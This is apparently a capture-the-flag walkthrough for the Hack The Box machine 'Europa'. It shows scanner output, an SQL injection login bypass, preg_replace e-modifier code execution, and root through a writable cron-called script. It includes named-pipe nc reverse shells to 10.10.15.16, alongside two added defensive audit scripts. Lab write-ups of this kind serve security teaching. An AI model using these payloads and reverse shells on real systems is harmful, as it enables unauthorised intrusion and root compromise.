Difficulty Rating:

Machine: Europa
OS: Linux
IP: 10.10.10.22

  • Nmap

$ nmap -T4 -sV -Pn -A 10.10.10.22

Starting Nmap 7.50 ( https://nmap.org ) at 2017-07-29 14:58 IST
Nmap scan report for 10.10.10.22
Host is up (0.19s latency).
Not shown: 997 filtered ports
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 6b:55:42:0a:f7:06:8c:67:c0:e2:5c:05:db:09:fb:78 (RSA)
|   256 b1:ea:5e:c4:1c:0a:96:9e:93:db:1d:ad:22:50:74:75 (ECDSA)
|_  256 33:1f:16:8d:c0:24:78:5f:5b:f5:6d:7f:f7:b4:f2:e5 (EdDSA)
80/tcp  open  http     Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
443/tcp open  ssl/http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: 400 Bad Request
| ssl-cert: Subject: commonName=europacorp.htb/organizationName=EuropaCorp Ltd./stateOrProvinceName=Attica/countryName=GR
| Subject Alternative Name: DNS:www.europacorp.htb, DNS:admin-portal.europacorp.htb
| Not valid before: 2017-04-19T09:06:22
|_Not valid after:  2027-04-17T09:06:22
|_ssl-date: TLS randomness does not represent time
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 41.10 seconds

  • Ports 80 and 443 are open. Let’s run dirb and nikto.

  • Dirb

$ dirb https://admin-portal.europacorp.htb/

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sat Jul 29 15:12:24 2017
URL_BASE: https://admin-portal.europacorp.htb/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: https://admin-portal.europacorp.htb/ ----
==> DIRECTORY: https://admin-portal.europacorp.htb/data/
==> DIRECTORY: https://admin-portal.europacorp.htb/dist/
+ https://admin-portal.europacorp.htb/index.php (CODE:302|SIZE:0)
==> DIRECTORY: https://admin-portal.europacorp.htb/js/
==> DIRECTORY: https://admin-portal.europacorp.htb/logs/
+ https://admin-portal.europacorp.htb/server-status (CODE:403|SIZE:316)
==> DIRECTORY: https://admin-portal.europacorp.htb/vendor/

---- Entering directory: https://admin-portal.europacorp.htb/data/ ----

---- Entering directory: https://admin-portal.europacorp.htb/dist/ ----
==> DIRECTORY: https://admin-portal.europacorp.htb/dist/css/
==> DIRECTORY: https://admin-portal.europacorp.htb/dist/js/

---- Entering directory: https://admin-portal.europacorp.htb/js/ ----

---- Entering directory: https://admin-portal.europacorp.htb/logs/ ----

---- Entering directory: https://admin-portal.europacorp.htb/vendor/ ----
==> DIRECTORY: https://admin-portal.europacorp.htb/vendor/jquery/

  • Dirb for PHP files

$ dirb https://admin-portal.europacorp.htb/ -X .php

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sat Jul 29 16:11:13 2017
URL_BASE: https://admin-portal.europacorp.htb/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
EXTENSIONS_LIST: (.php) | (.php) [NUM = 1]

-----------------

GENERATED WORDS: 4612

---- Scanning URL: https://admin-portal.europacorp.htb/ ----
+ https://admin-portal.europacorp.htb/dashboard.php (CODE:302|SIZE:0)
+ https://admin-portal.europacorp.htb/db.php (CODE:200|SIZE:0)
+ https://admin-portal.europacorp.htb/index.php (CODE:302|SIZE:0)
+ https://admin-portal.europacorp.htb/login.php (CODE:200|SIZE:3968)
+ https://admin-portal.europacorp.htb/logout.php (CODE:302|SIZE:0)
+ https://admin-portal.europacorp.htb/tools.php (CODE:302|SIZE:0)

-----------------
END_TIME: Sat Jul 29 16:27:53 2017
DOWNLOADED: 4612 - FOUND: 6

  • Nikto

$ nikto -h https://admin-portal.europacorp.htb/
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.22
+ Target Hostname:    admin-portal.europacorp.htb
+ Target Port:        443
---------------------------------------------------------------------------
+ SSL Info:        Subject:  /C=GR/ST=Attica/L=Athens/O=EuropaCorp Ltd./OU=IT/CN=europacorp.htb/[email protected]
                   Ciphers:  ECDHE-RSA-AES256-GCM-SHA384
                   Issuer:   /C=GR/ST=Attica/L=Athens/O=EuropaCorp Ltd./OU=IT/CN=europacorp.htb/[email protected]
+ Start Time:         2017-07-29 15:12:40 (GMT5.5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Root page / redirects to: https://admin-portal.europacorp.htb/login.php
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Hostname 'admin-portal.europacorp.htb' does not match certificate's names: europacorp.htb
+ Cookie PHPSESSID created without the secure flag
+ Cookie PHPSESSID created without the httponly flag
+ OSVDB-3093: /db.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ Server leaks inodes via ETags, header found with file /icons/README, fields: 0x13f4 0x438c034968a80 
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7517 requests: 16 error(s) and 10 item(s) reported on remote host
+ End Time:           2017-07-29 16:54:57 (GMT5.5) (6137 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
  • The login page is vulnerable to SQL injection.
  • The email field rejects spaces and requires an @ followed by more text, so the payload cannot be typed in directly.
  • Hence, type anything in the email box and intercept the request in Burp Suite.
  • Change the email parameter to: email=' union select 1,2,3,4,5;#&password=
  • You get access to the dashboard.
  • Go to tools.
  • Enter an IP address and check what the code does with it.
  • You’ll find a line like this in the source code of /tools.php:
<input type="hidden" name="pattern" value="/ip_address/">

Read the following article to understand the concept: https://bitquark.co.uk/blog/2013/07/23/the_unexpected_dangers_of_preg_replace

  • All we have to do is intercept the POST request and append ‘e’ to /ip_address/.
  • Intercept the POST request in Burp Suite and find a line similar to this:
pattern=%2Fip_address%2F
  • Add ‘e’ after pattern=%2Fip_address%2F, so it looks like this:
pattern=%2Fip_address%2Fe
  • So, basically, you’ve got RCE. Upload a PHP payload and get meterpreter.

Note: The current directory is /var/www/admin, and www-data has no write permission there. Find a directory inside /var/www/admin where the PHP file can be uploaded, for example the /logs directory.
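The bug behind the /tools.php step is worth finding and fixing, not just exploiting. The following POSIX shell script is an added example, not part of this writeup or of the box: it greps a PHP tree for preg_replace() calls whose pattern argument comes from a request superglobal or from a variable, and for literal patterns that already carry the e modifier (which evaluated the replacement as PHP code until it was removed in PHP 7.0). The hardened shape it contrasts with keeps the pattern fixed server-side, e.g. preg_replace('/ip_address/', $ip, $template) with $ip validated through filter_var(..., FILTER_VALIDATE_IP). The function names, the output format and the /var/www path in the usage line are my own assumptions.

```shell
#!/bin/sh
# Added example (not code from the original writeup): a static audit for the
# preg_replace() misuse behind the /tools.php RCE. The dangerous shape is a
# pattern argument the client controls, because the caller can append the e
# modifier (evaluates the replacement as PHP; removed in PHP 7.0) or change
# the regex altogether. Three things are reported, one line per hit, as
# "file:line:kind":
#   user-controlled-pattern  pattern is $_POST/$_GET/$_REQUEST/$_COOKIE
#   variable-pattern         pattern is a variable; trace where it is set
#   e-modifier               a literal /.../e pattern (only / delimiters are
#                            recognised by this simple check)
# The hardened form keeps the pattern fixed server-side and only places
# validated user data in the replacement or the subject string.

# report KIND: turn "line:match" lines from grep -n into "file:line:KIND".
# $f is the file currently being scanned by audit_preg_replace.
report() { cut -d: -f1 | while read -r n; do echo "$f:$n:$1"; done; }

# audit_preg_replace DIR: scan DIR recursively for *.php; always returns 0.
audit_preg_replace() {
    find "$1" -type f -name '*.php' | sort | while read -r f; do
        # 1. pattern argument is taken straight from request input
        grep -nE 'preg_replace[[:space:]]*\([[:space:]]*\$_(POST|GET|REQUEST|COOKIE)\[' "$f" \
            | report user-controlled-pattern
        # 2. pattern argument is a plain variable (needs manual tracing)
        grep -nE 'preg_replace[[:space:]]*\([[:space:]]*\$[A-Za-z][A-Za-z0-9_]*' "$f" \
            | report variable-pattern
        # 3. literal '/.../e' or "/.../ie" style pattern
        grep -nE "preg_replace[[:space:]]*\([[:space:]]*['\"]/[^'\"]*/[A-Za-z]*e[A-Za-z]*['\"]" "$f" \
            | report e-modifier
    done
    return 0
}

# Usage: sh audit_preg.sh /var/www   (path is an assumption)
if [ -n "${1:-}" ]; then audit_preg_replace "$1"; fi
```

A variable-pattern hit is not proof of a bug, only a place to read; the user-controlled-pattern and e-modifier hits are the ones that need a code change. Patterns using delimiters other than / (e.g. ~...~e) slip past the third check, so treat it as a first pass rather than a complete scanner.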

  • After getting a shell, check the /etc/crontab file.
$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user	command
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
* * * * *	root	/var/www/cronjobs/clearlogs
$ cat /var/www/cronjobs/clearlogs
#!/usr/bin/php
<?php
$file = '/var/www/admin/logs/access.log';
file_put_contents($file, '');
exec('/var/www/cmd/logcleared.sh');
  • Checking the permissions of /var/www/cronjobs/clearlogs shows that we can’t edit it.
$ ls -la /var/www/cronjobs/
total 12
drwxr-xr-x 2 root root 4096 Jun 23 09:21 .
drwxr-xr-x 6 root root 4096 May 12 20:27 ..
-r-xr-xr-x 1 root root  132 May 12 20:29 clearlogs
  • Let’s check for /var/www/cmd/logcleared.sh.
  • There is no such file.
  • Since root’s cron job exec()s it every minute, we can create it to get a root shell.
  • Create a file named logcleared.sh.
  • The contents of the file will be:
#!/bin/sh
mknod /tmp/backpipe p
/bin/sh 0< /tmp/backpipe | nc 10.10.15.16 80 1> /tmp/backpipe
  • Upload it to /var/www/cmd/logcleared.sh.

This is a handy way of getting a shell. It’s an alternative to nc <ip> <port> -e /bin/bash.

  • On the attacker’s side, start nc and wait for the connection:
sudo nc -nvlp 80
Listening on [0.0.0.0] (family 0, port 80)
Connection from 10.10.10.22 44886 received!
id
uid=0(root) gid=0(root) groups=0(root)
cat /root/root.txt
XXXXXXX
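The chain above (root runs /var/www/cronjobs/clearlogs every minute, which exec()s a script that does not exist, in a location www-data can write to) is exactly what a defender should hunt for on their own hosts. The following POSIX shell audit is an added example and not part of this writeup: it reads a system-format crontab, checks the absolute command path of every job, then checks every absolute path referenced inside those scripts, and flags targets that are missing (noting whether the nearest existing parent directory is writable by non-root) or writable by group/others. The function names are mine, and the CRON_OWNER variable is my own addition so the check can be exercised against test fixtures owned by a non-root user.

```shell
#!/bin/sh
# Added example (not part of the original writeup): audit a system crontab for
# the weakness exploited above. A job run as root, or a script that job calls,
# referencing a path that does not exist yet, or one a non-root user can
# write, lets that user run code as root the next time cron fires.
# The expected owner of cron targets is root unless CRON_OWNER says otherwise
# (an assumption made so the check can be run on test files).

# perm_issue PATH: print why PATH is unsafe as a root-run target, or nothing.
perm_issue() {
    set -- "$1" $(ls -ldL "$1")   # $2 = mode string, $4 = owner, $5 = group
    why=""
    case "$2" in ????????w*) why="writable by others" ;; esac
    case "$2" in ?????w*) [ "$5" = "${CRON_OWNER:-root}" ] || why="${why:+$why, }writable by group $5" ;; esac
    [ "$4" = "${CRON_OWNER:-root}" ] || why="${why:+$why, }owned by $4"
    echo "$why"
    return 0
}

# check_target PATH LABEL: one finding line per problem with PATH.
check_target() {
    p=$1; label=$2
    if [ ! -e "$p" ]; then
        # Deepest existing ancestor: if it is writable by non-root, an
        # unprivileged user can simply create the missing file.
        anc=$(dirname "$p")
        while [ ! -e "$anc" ] && [ "$anc" != "/" ]; do anc=$(dirname "$anc"); done
        reason=$(perm_issue "$anc")
        echo "MISSING  $p (from $label)${reason:+; ancestor $anc $reason}"
    else
        reason=$(perm_issue "$p")
        [ -z "$reason" ] || echo "WEAKPERM $p (from $label): $reason"
    fi
    return 0
}

# audit_crontab FILE: check every absolute command in a system-format crontab
# (m h dom mon dow user command) plus every absolute path mentioned inside the
# scripts those commands point to, which is how clearlogs -> logcleared.sh
# style chains are found. Always returns 0.
audit_crontab() {
    file=$1
    set -f                            # no globbing while splitting commands
    grep -v '^[[:space:]]*#' "$file" | grep -v '^[[:space:]]*$' |
    grep -v '^[A-Za-z_][A-Za-z0-9_]*=' |
    while read -r m h dom mon dow user cmd; do
        set -- $cmd                   # $1 = first token of the command
        case "$1" in
            /*)
                check_target "$1" "$file:$user"
                if [ -f "$1" ]; then
                    grep -o '/[A-Za-z0-9_./-]\{2,\}' "$1" | sort -u |
                    while read -r sub; do
                        [ "$sub" = "$1" ] || check_target "$sub" "$1"
                    done
                fi ;;
            *) ;;   # relative commands (cd, test, ...) depend on cron's PATH; skipped
        esac
    done
    set +f
    return 0
}

# Usage: sh audit_cron.sh /etc/crontab   (script name is an assumption)
if [ -n "${1:-}" ]; then audit_crontab "$1"; fi
```

Files in /etc/cron.d use the same seven-field format and can be passed the same way; per-user crontabs lack the user field and are not parsed. On a host set up like this box, the script would report the missing /var/www/cmd/logcleared.sh together with the writable directory above it, which is the finding to fix (create the script root-owned and mode 0755, or remove the exec call) before anyone else finds it.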

Note: An alternative way of getting a shell without meterpreter is to put the following code in the IP address field of /tools.php:

system('mknod logs/backpipe p; /bin/sh 0< logs/backpipe | nc 10.10.15.16 4444 1> logs/backpipe');
  • Listen using nc:
$ nc -nvlp 4444
Listening on [0.0.0.0] (family 0, port 4444)
Connection from 10.10.10.22 49688 received!
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
User and Root owned!!

Share the fun!